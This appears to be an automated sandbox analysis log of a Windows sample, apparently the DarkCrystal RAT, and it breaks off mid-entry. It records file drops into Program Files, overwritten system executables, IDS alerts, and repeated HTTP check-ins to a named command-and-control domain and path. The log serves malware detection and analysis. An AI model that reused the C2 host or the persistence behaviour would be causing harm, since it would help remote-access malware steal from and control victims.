Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\ed3206c147f2f1	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Internet Explorer\images\dwm.exe	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Internet Explorer\images\6cb0b6c459d5d3	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\ed3206c147f2f1	Jump to behavior

Source: bridgenet.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.pdb source: bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.pdb source: bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.pdbHBL source: bridgenet.exe.bin.exe, 00000000.00000002.1392935166.000000000387E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1805396503.000000001B8C4000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2229404359.000000001B6B6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.pdb source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000002B.00000002.1972756001.000000001BAB5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe, 0000001A.00000002.1805396503.000000001B8C4000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000003A.00000002.2229404359.000000001B6B6000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	File opened: C:\Users\user	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49814 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49962 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49917 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49980 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49982 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49975 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49983 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49984 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49979 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49976 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49978 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49985 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:49981 -> 104.21.112.1:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 977255cm.nyashkoon.inContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 977255cm.nyashkoon.in

Source: unknown

HTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 977255cm.nyashkoon.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:33:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izWYlmVeCo5V4nF55Uh4UZvn16mna64ngJKO8ksQ0TlS8JJ9fyPDsVs7N50T9nMsdAeclkcDWVlJzAY4NHyr5CUMNlH3MgtQoDP3LEabtHvlZNbmJq17KWb%2BVLA2E5jC1mrwrkIE3s8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901569ed8bb4727b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8359&min_rtt=1965&rtt_var=13525&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=27485&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:33:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cim5UNlFbJNoifwDe%2FUseCS0HyCgo4rspA%2Bdat5AjI7tAmvcfbFIvGfZ%2Bax1IWi%2F0qtzBi5U2IqttpJa3Bp8C4kLoJiL3AqIod1%2Bsl%2Fjjx6EXZWqf%2FNJX3vuBke16PFHLapTlCAnWZs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156a5d8ca1c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2859&min_rtt=1447&rtt_var=3368&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=114527&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:33:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FerXsv46GKzGWWZAAx6HHy9roIQeWQVU7ELv60GnAa1FApAtKebKvrbYrCU7YzPGhzdn6tOQn1ekpzkkp7LmAfWFXHNZgsTXRkXDMJFoRSG99o%2FICIP%2FubYkHD3EOwZWigBBud%2FDixY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156a903f75424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2794&min_rtt=1580&rtt_var=3022&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=129226&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:33:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CiAAhwEzLlifB%2BXqkKPBL5rp%2B9Jhl8MfTqcvfUIi5gjV3nkBwCeLl2jnkaWsbxqtrCB1X9zMugRsxKal2qw4m%2BtvT6AisW95WuyLGWUcRphvEKLK8i85duYPbnBbeug%2Fleyyimdh9wY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156aabfa63c34f-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=2768&min_rtt=1589&rtt_var=2955&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=132414&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:33:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7AQDDi4I3YUg7ngmIyq%2F7O3rnU8H2M5zizJ6zbaZRyqQkZ5sGB%2BnT%2Bwk17AZfmaiMrWIldU9V7DowWwWAKLsOoCWUoOJToO3KGtGawsFhqFtCLqsPHkvh1Vii%2BsJW4ON5qkVkM2nupg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156ac21ed9424b-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3560&min_rtt=1570&rtt_var=4569&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=617&delivery_rate=83466&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:33:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FG%2Bmzh%2FA1FxAdPawT4lIX%2BmjDRmQMt4QLAesnDnPVrcpgLeMGsZd6B0%2Bi8ECtrHHKKm9UuRQNQDQ250COLax55bAeXULOtBy6LhpV0P6MQLpxi9d4qj1hMPbNeNxE8bW5WJ5S7Ki0tw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156ae16805424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1582&rtt_var=1110&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=399780&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:34:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FfrpEDT9gYE5NAlmcBjPSkAMyyGMU8rcxWYm30WdUU30c%2FAsHAUrVYjzs%2F6yFb%2BEAuaZj8CMHMdxboEpf83j%2FRLzMPWIEFBy3AL%2BSg8hlOd33CGwg3X%2BE9f9KTRr2ckh9n3%2Bd8lWLg4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156afd1bcf43b3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3510&min_rtt=1575&rtt_var=4460&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=652&delivery_rate=85605&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:34:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cDjmVkZA3IW4bYbiTATXX6%2FW6cWAG%2B35yY5MvfoNlwnngXsjX90%2BwcvCJGi08f3C%2BqrXcIVQdbITebhoB0gqkOZnpIDa6HhrqMjJtLdE4zVZweAmnWhwq57lI%2F7lLC5DTGwTDGeBEew%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90156b68fdb90f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1568&rtt_var=1345&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=670&delivery_rate=317460&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 